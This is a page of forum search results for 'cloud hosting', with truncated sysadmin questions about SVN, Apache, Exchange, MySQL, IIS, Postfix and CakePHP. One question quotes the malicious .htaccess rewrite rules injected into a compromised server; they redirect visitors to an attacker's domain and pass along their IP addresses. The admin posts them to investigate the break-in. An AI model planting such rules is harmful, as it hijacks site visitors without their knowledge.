Search Results

Search found 8849 results on 354 pages for 'cloud hosting'.

Page 314/354 | < Previous Page | 310 311 312 313 314 315 316 317 318 319 320 321  | Next Page >

  • Connecting SVN from Remote Server

    - by Ashish
    I have hosted my repository in assebbla & it works fine. now I want to write a script that can automate the build process : 1. Take the code from assembla repository 2. Make a dump and copy it onto my web server. what I have researched from net states that use of commands like svn co svn+ssh://[email protected]/home/svn/test I believe I need to open Shell on my server and type these commands but shell has been disabled from my server admin. I tried to run the same from php using exec , admin has disabled that too. (am using shared hosting and want to do a automated deployment using these simple steps. i don't want to bring my local system in this process) now am not sure even if I get the shell access open to my server these commands like svn will work there as I don't have SVN installed on my server (its installed on assembla). kindly let me know if any more explanation is required regarding the same or if am going on the wrong track. Am a newbie so please be descriptive in answering :) Thanx in advance Ace

    Read the article

  • Separate domains vs. one domain with alias-domains

    - by Quasdunk
    I have tried to ask this question a few days ago but I'm afraid it was not clear enough, so here's another try. I have set up a LAMP-server using ISPConfig 3 for the administration. PHP is running over Fast-CGI. I have several domains, like my_site.com, my_site.net and my_site.org, but they all point to the same application/website. Each domain has its own web-root-folder and is running under its own user. The application itself is in a common directory which is owned by another user, like so: # path to my_application (owned by web1) /var/www/clients/client1/web1/web/my_application/ # sym-link to my_application from my_site.com-web-root (owned by web5) /var/www/my_site.com/web -> /var/www/clients/client1/web1/web/ # sym-link to my_application from my_site.net (owned by web4) /var/www/my_site.net/web -> /var/www/clients/client1/web1/web/ With a setup like this I have encountered a few problems concerning the permissions when performing filesystem-operations with PHP. For instance, if the application is called via my_site.com, the user web5 is trying to write something to the application-folder. But the application-folder is owned by the user web1, so web5 is not allowed to write there. As far as I unterstand, this is how Fast-CGI works. After some research and asking a few people, the solution seems to be to break it all down to one domain (e.g. my_site.com) and define the other domains (my_site.org, my_site.net) as alias for this one domain. That way, there would be only one user who has all necessary permissions. However, this would mean that we'd have to buy a multidomain SSL-certificate - but we already have an SSL-certificate for each domain. We were able to use them with our previous provider (managed hosting), and there we also had only one web-directory and multiple domains. So if this was possible, I wonder: Is putting all the domains together into one v-host with one main- and several alias-domains the right approach in this case? Or may I have misunderstood something?

    Read the article

  • Emails sent from Coldfusion using the same SMTP/Exchange server works from one machine but fails for another

    - by Peter Herdenborg
    First, apologies if this question is too vague or has too little information to really be answerable. I am not normally working with these issues, and I don't have full access to the environment. However, the hosting provider seems to have a hard time tracking down the issue, so I am hoping that someone can at least provide me with some qualified guesses about the most likely problem. Here goes: A client I work for has a hosted IT environment, based on virtual machines running Windows 2008 R2 Standard. Our website, based on Coldfusion 9 was recently migrated from one virtual machine to another, and though Coldfusion is configured in the exact same way, using the same SMTP server, i.e. the client's Exchange server hosted in the same environment and in the same AD as both web servers, sending emails to external recipients is no longer working. It is still working fine when testing from the old machine. This is what I've learnt so far (all emails are sent using a valid from-address on the client's domain): Emails sent to other recipients on the same domain are delivered without any problem. Emails sent to external recipients on other domains are never delivered. When sending emails to both internal and external recipients, no emails are delivered. When receiving one of these emails to an internal address, the sender is now indicated as "[email protected]", while when sent from the old machine, it used to say just "sender". This seems to me that it could hint that the Exchange machine "recognizes" the old web server while it is a stranger to the new. In Coldfusion's mail log, all messages appear to be successfully delivered to the SMTP server. Any ideas what settings to look at, what log entries to search for or how to compare the old web server with the new one will be highly appreciated.

    Read the article

  • debian lenny email server

    - by Dal
    Hi I am a newbie and set up a debian lenny at home and set up the web and email server in the default installation. I followed the instructions for Exim and ran dpkg-reconfigure exim4-config and set it up for mydomainhere.com. I created a one line message file and attempted to test exim by running the command exim [email protected] < msgfile. I also tried using exim4 Exim but i get same error -bash: Exim: command not found. Obviously I am ignorant on how to run exim and test. I also tried to run a php file that sends a test mail and had no success. That script is tested and works fine if I send it from my hosting isp on a different domain. So I know the php script is good. I set up the debian system behind a netgear firewall and uses 192.168.1.x ip . The web server works great and users can visit my site. But I am lack the knowledge on how to get the email working. Appreciate is someone can guide me.

    Read the article

  • IIS 6 Denies access to the default document

    - by Jim
    I've got Windows Server 2k3 with IIS6 hosting a couple ASP.NET MVC 2 applications (.NET 4), all in the Default Web Site. Most of them simply use Integrated authentication, but a couple use forms as well. All the applications work properly and are correctly accessible. The problem I'm trying to resolve is access to the default document. It is currently specified as index.htm. Both index.htm and the Default Web Site are configured to allow anonymous access (with none of the authenticated acces boxes checked). However, access is denied to the file. Accessing via server.domain.tld/ and server.domain.tld/index.htm both yield 401 errors. However, server.domain.tld/default.htm (file does not exist) properly returns a 404. If I alter the file security on index.htm to allow integrated authentication, then requesting /index.htm directly works properly for users with domain accounts, but anonymous users get a login prompt/401. How can I configure IIS to allow all users to view index.htm via server.domain.tld/?

    Read the article

  • How do I make a PPT file as small as possible?

    - by grunwald2.0
    Currently I am agonizing over several large presentation files, which I happened to reprint to PDFs... One thing I wondered: Do PPT's (from Microsoft Powerpoint) always to have to be that big? And what would be the strategies to make a PPT smaller? (If we say "ceterus paribus" at e.g. 25 slides and assuming that one isn't allowed to use a cloud-based service like GDocs, rocketslide or Prezio.) Of course there are the obvious "bad guys": Images and graphics. But: How about roll-over animations etc, who knows how much space they take? How about "smart arts"? Could one save file size if one would use "Open Office" or "Libre Office" Impress? (I didn't try it yet.) And "what if": What if we need to include e.g. five images (or charts that can't be remade in Excel in time), how would we best reduce the file size impact of those five images, if we needed to? I ask all this from an honest "business" perspective. I am no nerd or "Microsoft MVP" and I don't intend on delving into LATeX or similar yet. But that doesn't mean that I am not curious and very willing to learn. I am basically interested in (proven) best practices. Yes I know this question is lacking "initial research", but I think the perspective of my question is interesting and unique to a lot of people and if we intend to make SE a "Q&A" / Wiki kind-of reference site, this question might be a good way to "collect" advice on a question that has a very defined goal: Minimum file-size.

    Read the article

  • mysql - moving to a lower performance server, how small can I go?

    - by pedalpete
    I've been running a site for a few years now which really isn't growing in traffic, and I want to save some money on hosting, but keep it going for the loyal users of the site and api. The database has one a nearly 4 million row table, and on a 4gb dual xeon 5320 server. When I check server stats on this server with ps -aux, i get returns of mysql running at about 11% capacity, so no serious load. The main query against mysql runs in about 0.45 seconds. I popped over to linode.com to see what kind of performance I could get out of one of their tiny boxes, and their 360mb ram XEN vps returns the same query in 20 seconds. Clearly not good enough. I've looked at the mysql variables, and they are both very similar (I've included the show variables output below, if anybody is interested). Is there a good way to decide on what size server is needed based on what I'm coming from? Is it RAM that is likely making the difference with the large table size? Is there a way for me to figure out how much ram would be ideal?? Here's the output of the show variables (though I'm not sure it is important). +---------------------------------+------------------------------------------------------------+ | Variable_name | Value | +---------------------------------+------------------------------------------------------------+ | auto_increment_increment | 1 | | auto_increment_offset | 1 | | automatic_sp_privileges | ON | | back_log | 50 | | basedir | /usr/ | | bdb_cache_size | 8384512 | | bdb_home | /var/lib/mysql/ | | bdb_log_buffer_size | 262144 | | bdb_logdir | | | bdb_max_lock | 10000 | | bdb_shared_data | OFF | | bdb_tmpdir | /tmp/ | | binlog_cache_size | 32768 | | bulk_insert_buffer_size | 8388608 | | character_set_client | latin1 | | character_set_connection | latin1 | | character_set_database | latin1 | | character_set_filesystem | binary | | character_set_results | latin1 | | character_set_server | latin1 | | character_set_system | utf8 | | character_sets_dir | /usr/share/mysql/charsets/ | | collation_connection | latin1_swedish_ci | | collation_database | latin1_swedish_ci | | collation_server | latin1_swedish_ci | | completion_type | 0 | | concurrent_insert | 1 | | connect_timeout | 10 | | datadir | /var/lib/mysql/ | | date_format | %Y-%m-%d | | datetime_format | %Y-%m-%d %H:%i:%s | | default_week_format | 0 | | delay_key_write | ON | | delayed_insert_limit | 100 | | delayed_insert_timeout | 300 | | delayed_queue_size | 1000 | | div_precision_increment | 4 | | keep_files_on_create | OFF | | engine_condition_pushdown | OFF | | expire_logs_days | 0 | | flush | OFF | | flush_time | 0 | | ft_boolean_syntax | + - For some reason, that table formats properly in the preview, but apparently not when viewing the question. Hopefully it isn't needed anyway.

    Read the article

  • Creating a private wiki

    - by Hand-E-Food
    I want to create a simple, private wiki, but am really struggling to find what I need. I require the following features: Private wiki. Only I will read or write it. Some formatting capability: headings, bold, italic, bullets, block quotes Wiki Viewer for Windows 7. If it comes with an editor, I need to be able to hide it. Page Editor for Windows 7. Page Editor for iPhone. Synchronize by cloud but available offline in Windows. So far, my research has led me to Markdown language. I can easily edit this as plain text using Notepad++ for Windows and Elements for iPhone. I can sync these files through Dropbox and have them available offline. What I can't find is a suitable viewer for Windows. I'd prefer to steer away from using HTML due to its verbose formatting codes. Can anyone recommend a solution for me? If need be, I'll happy to make a small one-off payment for software.

    Read the article

  • Centralized backup method recommendation for SMEs with various OSes

    - by Akinator
    Hi I was wondering what in your opinion is the "best" method for having "everything" backed-up in the following situation. We are a SMEs with 10 computers in total. Three of those computers are MACs The rest are windows (1 vista, 4 win7 and 2 XPs) I'm very open to what the method should be but you should also consider the follwing: Very limited resources Quite "small" bandwidth (4 MBs for all (download) 0.4 MBs (upload, yep, thats it)- though this might get, a little bit better) One of the main thing to back up would be the mails, considerations: All windows computers use outlook, mainly 2003 There is one mac that uses outlook too (for mac of course - not 2011 yet) We also have to backup the files: Not a huge amount Very few very big files Very organizes (by machine) What I would like is to hear your opinions as to which would be the best method (or combination of methods - preferably one of course) considering. We are not sure what do we need and I'm open to suggestions, though an online (cloud based applications) would be great, remember the the bandwidth is unbearable. Last think to consider, it that we would like to do weekly updates (unless the method is very easy of course). Thanks in advance!! I tried to be as specific as possible, but if anything is needed I'll gladly update, please ask for any clarification needed! Please avoid any answers like upgrade all to windows 7 and throw away your macs :) our's may not be an ideal situation, but it is what it is, and right now, it would be impossible for us to change it for a lot of circumstances.

    Read the article

  • Bizarre client IP switch-up on VPN

    - by B. VB.
    Let A.B.C.D be the public IP of my VPN server. Let W.X.Y.Z be the IP of the client before it connects to the VPN. My VPN server's IP address on the LAN in 10.8.0.1, and the client is 10.8.0.6. I also run a webserver on the same machine hosting the VPN. On it is a simple webpage that performs the exact same thing as whatismyip.org (i.e., simply prints the IP of the requester) Let me illustrate the scenario for you. In a Chrome window I have three tabs, what I have in parenthesis is the URL: Tab 1 (http://whatismyip.org): A.B.C.D This is what I expect to see. It's the public IP of the VPN server. Tab 2 (http://10.8.0.1): 10.8.0.6 ok, looks expected. They are behind the same LAN now. Tab 3 (http://A.B.C.D) W.X.Y.Z WTF?? Basically, if I access the webserver while tunneled, in shows the IP address of my machine PRIOR to tunelling! Remember, tab2 and tab3 are the same webpage. Why does Tab3 not show the client IP as it's own IP (i.e., show A.B.C.D)??? I hope this question is clear, thanks in advance!

    Read the article

  • Something like Dropbox for local use

    - by Casper
    I am looking for a solution to sync folder pairs between a NAS and multiple local macs. Each of the macs could edit files and the other macs should then get synced automatically. Basically my own local version of Dropbox without using "cloud-storage". I have looked into solutions using rsync. As I understand it rsync is not really capable of doing a bi-directional sync. I also do not want to necessarily invoke the sync process. I would prefer a daemon running in the background - waiting and checking for changes and then syncing them "live". The program should also be flexible enough to recognize that it sometimes (in the case with laptops) can not reach the NAS. It should then just wait for the connection to be back again, without bugging me ever few minutes. I have looked into synk, folderwatch, rsync and a few others, but I haven't really found a solution. Isn't there something like "offline folders" from microsoft for the mac? Thanks PS: just for clarification - I don't want to sync for backup purposes, instead I am wanting to sync so that all macs have a local copy of the most recent changes to files.

    Read the article

  • Finding Webserver Vulnerability

    - by Brent
    We operate a webserver farm hosting around 300 websites. Yesterday morning a script placed .htaccess files owned by www-data (the apache user) in every directory under the document_root of most (but not all) sites. The content of the .htaccess file was this: RewriteEngine On RewriteCond %{HTTP_REFERER} ^http:// RewriteCond %{HTTP_REFERER} !%{HTTP_HOST} RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR} Googling for that url (which is the md5 hash of "antivirus") I discovered that this same thing happened all over the internet, and am looking for somebody who has already dealt with this, and determined where the vulnerability is. I have searched most of our logs, but haven't found anything conclusive yet. Are there others who experienced the same thing that have gotten further than I have in pinpointing the hole? So far we have determined: the changes were made as www-data, so apache or it's plugins are likely the culprit all the changes were made within 15 minutes of each other, so it was probably automated since our websites have widely varying domain names, I think a single vulnerability on one site was responsible (rather than a common vulnerability on every site) if an .htaccess file already existed and was writeable by www-data, then the script was kind, and simply appended the above lines to the end of the file (making it easy to reverse) Any more hints would be appreciated.

    Read the article

  • Remotely port forward/launch process or a client-less remote desktop app?

    - by DC177E
    I have an XP box running Logmein at a remote location behind a linksys router, which was running well for a whole of four days, until we had a power failure. Our ISP gave us a new IP, the machine restarted, and logmein did not autorun (or, at least, it did not automatically sign in), and our service (which may or may not be a Minecraft server with non-backed-up save files) also did not run upon startup. Logmein does not register the new IP (it still displays the old one). I have a DDNS updater service, so I do know the new dynamic address. I have tried using the built in XP remote desktop service, but, as with almost all non-cloud-based remote desktop services, it requires a port forward. Thus, I would appreciate it if anyone has any ideas as to: A: Any way of accessing our router remotely to forward the remote desktop port. I've seen the Remote Management option (forwarding the setup page to port 8080), but I do not have it enabled. I've tried UPnP, but again, the setup page for our router is not forwarded. B: Any way of remotely launching a process that does not require port forwarding (or uses ports 255XX, 18XXX, or 9000.), such as a remote console service built into XP. I realize this is a near impossibility. C: A Way to remotely start logmein, and sign in, which is likely a definite impossibility. Sorry if this is too specific for Stackexchange, or if I've put it into the wrong section (is SuperUser the correct place for this?). Ideas would, again be much appreciated, as shot-in-the-dark-like this may be.

    Read the article

  • How much free memory should I have on my webserver?

    - by neanderslob
    I have a webserver that's currently hosting two Wordpress sites and some java-based collaboration software. The server has 2G of memory and is currently using about 1.8G of the available memory. Right now what's on here is pretty much a pilot project that's getting negligible traffic so I think it's pretty clear that I'll be needing more memory. I was wondering, if I was to release it, how I might anticipate my memory needs based on the traffic it gets. I've poked around on Google and what I've found has been a bit tenuous. Is there a good heuristic that one should use when calculating memory demands as a function of the base (no traffic) load on the server? For reference, the output of free -m can be seen below: total used free shared buffers cached Mem: 2048 1832 215 0 0 0 -/+ buffers/cache: 1832 215 Swap: 0 0 0 To me this looks like actual memory used and isn't an illusion due to caching or anything else. I figure the demands of my collaboration software will have to be experimentally tested so here's free -m without that software running: total used free shared buffers cached Mem: 2048 1109 938 0 0 0 -/+ buffers/cache: 1109 938 Swap: 0 0 0 My plan B to figure this out is to add a bunch of swap space to the server, give it some traffic and adjust according the the amount that swap gets used. I was just wondering if anyone had a good rule of thumb to estimate how much memory I should plan on in advance...or if what I'm thinking is nuts. Many thanks in advance (I'm really quite new to this).

    Read the article

  • mail server checklist..

    - by Jeff
    currently we ran into some issues with our mail server setup. im preparing a list of actions that we should enforce and use in order to maintain a proper email solution within our company. we have around 80 exchange users, and send mass emails out almost on a monthly bases to 20,000 + customers each time.. the checklist i currently have: 1) mcafee mxlogic 'cloud' anti-spam functionality for incoming message. 2) antivirus on each computer in company 3) antivirus on exchange and DNS servers 4) setup SPF record 5) setup DKIM 6) setup domainkey 7) setup senderID 8) submit spf to microsoft, yahoo, etc. for 'whitelist' purposes. 9) configure size limits for messages in exchange to safe numbers 10) i have 2 outside IPs for my email server, incase one gets blacklisted, switch to the backup. 11) my internet site rests on a different ip than the mail server 12) all mass emails for company sent through 3rd party company (listtrak.com) 13) setup domain alias, media, enews, and bounce for the 3rd party mass mail software. 14) verify the setup using [email protected] 15) configure group policy and our opendns.org account to prevent unwanted actions and website viewing mass emails: 1) schedule them to send different amounts at different times (1,000 at 10am, 1,000 at 4pm, 1,000 10am next day).. 2) setup user prefences, decide what they want to receive ect. ( there interests) 3) send a more steady flow of email, maybe 100 a week with top new products instead of 20,000k every other month.. if anyone has suggestions or additions/subtractions to this checklist they are greatly appreciated. thank you

    Read the article

  • Concurrent users with Quickbooks?

    - by airietis
    I work in a company with 3 people who regularly use the same Quickbooks file. However, they work remotely on different networks. I need to implement a solution that allows all three of us to access Quickbooks at the same time remotely (and each make changes at the same time). We have a spare desktop PC that can be utilized as a server. So, my question is: what is the cheapest and most hassle-free solution to solving this problem? I've considered using application cloud hosting, however, it is very expensive ($40 per user a month) and we are on a tight budget. Is it possible to install Quickbooks on my own server, and have them connect to it remotely? If so, what is the best way to accomplish this? Remote desktop protocol? Or is there a built in feature for this with Quickbooks Premier 2013? EDIT: As MDMarra mentioned, I am looking for a solution that offers true simultaneous access. Will using a dedicated server and having users connect to a VPN be a viable solution?

    Read the article

  • Mail Server using Postfix

    - by unknown (google)
    I have currently set up my web application on Amazon EC2 server. As a well known fact sending email from EC2 has a problem. As a cheap and long lasting solution instead of using "authsmtp" is it possible to rent a server and use it as a Mail Server? I am currently looking for cheap hosting which will give me root access so that it can be configured and used as a relayhost. I am curently using Postfix as MTA. Has any one implemented this before? I am curious about its feasibility of this solution. I guess common requirements are: 1: Dedicated IP which is not black listed. 2: Open relay( open to my Server only) Any Tips for Header configurations to keep the mails out of spam folder. This is like exactly cloning authsmtp for personal use. Any suggestions for other Mail Server software instead of Postfix? Another problem is Reverse DNS for this server. Should PTR entry be present if a server is used as a relayhost?

    Read the article

  • Managed LAMP platform for maximizing availability and global reach, not scalability

    - by user66819
    Assume a Linux/Apache/MySQL/PHP application for a small base of registered users. With small userbase, there are no traffic peaks so the scalability that cloud platforms offer is not imperative. But the system is mission-critical, so availability is the primary goal. Users are also distributed across Asia, Europe, and US, so multiple server locations that minimize users' network hops would be highly desirable. The dream: a managed VPS platform where we would configure a single server (uploading PHP and other files, manipulating database, etc.), and the platform would automatically mirror the server in a handful of key places around the world (say one on each US coast, one in Europe, one in east Asia). File system synchronization and MySQL replication would happen automatically. Core operating system is managed, so we don't need to do full system administration and security, and low-level backups are also done by service provider, though we also do our own backups as well. Couple this with some sort of DNS geo-detection, so users are routed to the nearest operational server... with support for https, of course. Does such a dream exist? If not, what are some approaches to accomplish the same end with minimal time investment and minimal monthly hosting costs?

    Read the article

  • Problem running MVC3 app in IIS 7

    - by mjmoore99
    I am having a problem getting a MVC 3 project running in IIS7 on a computer running Windows 7 Home-64 bit. Here is what I did. Installed IIS 7. Accessed the server and got the IIS welcome page. Created a directory named d:\MySite and copied the MVC application to it. (The MVC app is just the standard app that is created when you create a new MVC3 project in visual studio. It just displays a home page and an account logon page. It runs fine inside the Visual Studio development server and I also copied it out to my hosting site and it works fine there) Started IIS management console. Stopped the default site. Added a new site named "MySite" with a physical directory of "d:\Mysite" Changed the application pool named MySite to use .Net Framework 4.0, Integrated pipeline When I access the site in the browser I get a list of the files in the d:\MySite directory. It is as if IIS is not recognizing the contents of d:\MySite as an MVC application. What do I need to do to resolve this?

    Read the article

  • Ping results "echo'd" out to a text file on Windows XP machine has unusual character rather than the outcome

    - by Richard Rice
    Here is the situation. I have a Windows XP machine that I would like to ping another machine and send the output to a text file for review at a later date. This is quite a standard question with several answers on this website and others. The issue I have is that when reviewing the txt file afterwards, the outcome of the ping appears as a strange character. A screenshot of the text file output can be found at the following link. Please note its the first 8 ping outputs that have a strange character. The %%B was me hoping that would output what I wanted! (Cannot upload image to any hosting websites because the company I work for seems to be afraid of them ....) Here is the code I'm using: @echo off For /f "tokens=1-2 delims=/:" %%b in ("%TIME%") do (set mytime=%%a%%b) PING 1.1.1.1 -n 1 -w 1000 >NUL for /f "tokens=*" %%A in ('ping 192.168.5.2 -w 10 -n 1') do (echo %date% %time% %%A >> C:\Temp\Ping_Checks\GarrickSide.txt && GOTO Ping ) :Ping PING 1.1.1.1 -n 1 -w 1000 >NUL for /f "tokens=* skip=2" %%A in ('ping 192.168.5.2 -w 10 -n 1') do (echo %date% %time% %%A >> C:\Temp\Ping_Checks\GarrickSide.txt && GOTO Ping ) This code works fine on a Windows 7 machine, but not on a Windows XP machine. It appears that the echo command isn't outputting the right data, but I don't understand this enough to correct it. Can anyone spot where I'm going wrong?

    Read the article

  • Google MAIL not arriving - relay not allowed

    - by renevdkooi
    I have a server with sendmail, hosting my domain mind-zone.nl, i changed the MX records to point to the server. When I use Hotmail or any other client the email arrives and everything is fine. ONLY mail from GMAIL server is bounced and gmail returns "relay denied". I have set all the virtual server host settings etc, from command line I can send mails as well, hotmail works, etc. Just not gmail. The strange thing is, this is what gmail returns: Look at the lower part: "Received by" it returns some IP address which is not mine and has absolutely nothing with my domain. While when I do a NSLOOKUP and change to google's DNS server it will state that the IP Address for my domain is correctly pointing at my server. Technical details of permanent failure: Google tried to deliver your message, but it was rejected by the recipient domain. We recommend contacting the other email provider for further information about the cause of this error. The error that the other server returned was: 554 554 5.7.1: Relay access denied (state 14). ----- Original message ----- MIME-Version: 1.0 Received: by 10.14.37.138 with SMTP id y10mr3421504eea.43.1297665573901; Sun, 13 Feb 2011 22:39:33 -0800 (PST) Received: by 10.14.29.75 with HTTP; Sun, 13 Feb 2011 22:39:33 -0800 (PST)

    Read the article

  • Wildcard subdomain setup ... want to change host IP throws off client A records... what to do...

    - by Joe
    Here is the current set up (in a nutshell). The site is set up with a wildcard subdomain, so *.website.com is accessible. Clients can then domain map their own domains with an A record to the server IP address and it will translate the to appropriate *.website.com with re directions and env variables in htaccess. Everything is working perfect... but now comes the problem. The site has grown larger than a single DQC Xeon server can handle at peak times. Looking at cloud options seems tempting, but clients are pointing their domains to a single IP address with the A record (our server). Now, this was probably bad planing from the start, but the question is, if this was to be done today, how would we set it up so that clients use a CNAME perhaps to point their domains to our server rather than an A record. And, if that is not possible for the root domain, how can we then use multiple IP addresses on our side to translate the incoming http request? Complex enough? Hope I've explained it well!

    Read the article

  • What kind of server configuration is best for a chatting app? [closed]

    - by mohabitar
    I'm just now starting to go deeper into the world of cloud hosting and databases, and am getting overwhelmed by how deep this information goes. It's all a little too much to consume in a short amount of time. I get a lot of pricing information, but I'm unable to determine what that means to me. I'm making what you might compare to an email app. Users can send messages to one another. I just don't understand, out of the several options, what would be ideal for an app like this, where users would be constantly sending and receiving text data. With Amazon DynamoDB, I have to specify a pre-defined throughput with number of reads and writes per second. Sure I can just type 50, but I'm not exactly sure what 50 writes per second represents. I'm trying to determine what would be the most cost efficient solution, and I want to know what a throughput of 50 reads/writes/second compares to. Is that a high number? What is a good throughput number for a message sending app with say 50,000 daily users? I'm just providing specific numbers so I can understand what these throughput numbers represent. 100 transactions/second to me seems like a small number since I'm not familiar with this stuff, so I'm just looking to bring everything in context. What would 100 read/write/second be useful for? Are there any average example values available? And I'm not sure what each service is good for. For a message sending app, is there any reason I'd want to choose say Amazon DynamoDB over Google App Engine? Any insight would be greatly appreciated.

    Read the article

  • Enabling `mod_rewrite` apache, permissions issues

    - by rudolph9
    In attempting to enable mod_rewrite on the Apache2 web server installed with Mac OSX 10.7.4. Following these instruction, ultimately using the configuration to host CakePHP applications, I run into permissions issues accessing the site via a web browser when I set the directory block associated with cakephp site /etc/apache2/users/username.conf from: <Directory "/Users/username/Sites/"> Options Indexes FollowSymLinks MultiViews AllowOverride none Order allow,deny Allow from all </Directory> /etc/apache2/users/username.conf to: <Directory "/Users/username/Sites/"> Options Indexes MultiViews AllowOverride none Order allow,deny Allow from all </Directory> <Directory "/Users/username/Sites/cakephp_app/"> Options Indexes FollowSymLinks MultiViews AllowOverride all Order allow,deny Allow from all </Directory> The .htaccess files are the CakePHP 2.2.2 default as follows: /Users/username/Sites/cakephp_app/.htaccess <IfModule mod_rewrite.c> RewriteEngine on RewriteRule ^$ app/webroot/ [L] RewriteRule (.*) app/webroot/$1 [L] </IfModule> /Users/username/Sites/cakephp_app/app/.htaccess <IfModule mod_rewrite.c> RewriteEngine on RewriteRule ^$ webroot/ [L] RewriteRule (.*) webroot/$1 [L] </IfModule> /Users/username/Sites/cakephp_app/app/webroot/.htaccess <IfModule mod_rewrite.c> RewriteEngine on RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^(.*)$ index.php [QSA,L] </IfModule> When performing the request via a web browser at to http://0.0.0.0/~username/cakephp_app/index.php the content of the response is Not Found The requested URL /Users/username/Sites/cakephp_app/app/webroot/ was not found on this server. Apache/2.2.21 (Unix) DAV/2 PHP/5.3.10 with Suhosin-Patch Server at 0.0.0.0 Port 80 Upon a request to http://0.0.0.0/~username/ and http://0.0.0.0/~username/cakephp_app/, added to /var/log/apache2/error_log accordingly are the following: [Tue Sep 04 22:53:26 2012] [error] [client 127.0.0.1] File does not exist: /Library/WebServer/Documents/Users, referer: http://0.0.0.0/~username/ [Tue Sep 04 22:53:26 2012] [error] [client 127.0.0.1] File does not exist: /Library/WebServer/Documents/favicon.ico What is causing the issue? Is there server program, ideally available via a homebrew script, which would make hosting CakePHP applications for testing purposes more effective and efficient?

    Read the article

  • Only receiving one document at a time from new web server.

    - by Robert Kuykendall
    We're trying to move our internal ticketing system from a Microsoft Small Business Server in the server closet to a Rackspace Cloud Server. The install is Fedora 11 LAMP, and should be default out of the box, except for the vhosts appended to the bottom of the httpd.conf. The new server is suffering from crippling load times, and watching the page load in Firebug it's easy to see the problem occurring, but I can't figure out the cause. Here is the [old server] (http://rkuykendall.com/uploads/old.server.png). I was expecting something like this, but a little slower since it was no longer hosted locally. Instead, the [new server] (http://rkuykendall.com/uploads/new.server.png) appears to only serve one file at a time. Here's another example of this [staircase load time effect] (http://rkuykendall.com/uploads/staircase.png) and another very clear example of the [staircase effect] (http://rkuykendall.com/uploads/staircase2.png). I talked to some guys on Freenode #httpd with no luck. I created a duplicate server to play with, and also created a fresh server with Fedora Core 13 and moved over just the database and web files with no luck. Any suggestions? ( image links disabled due to n00b-spam-restrictions )

    Read the article

< Previous Page | 310 311 312 313 314 315 316 317 318 319 320 321  | Next Page >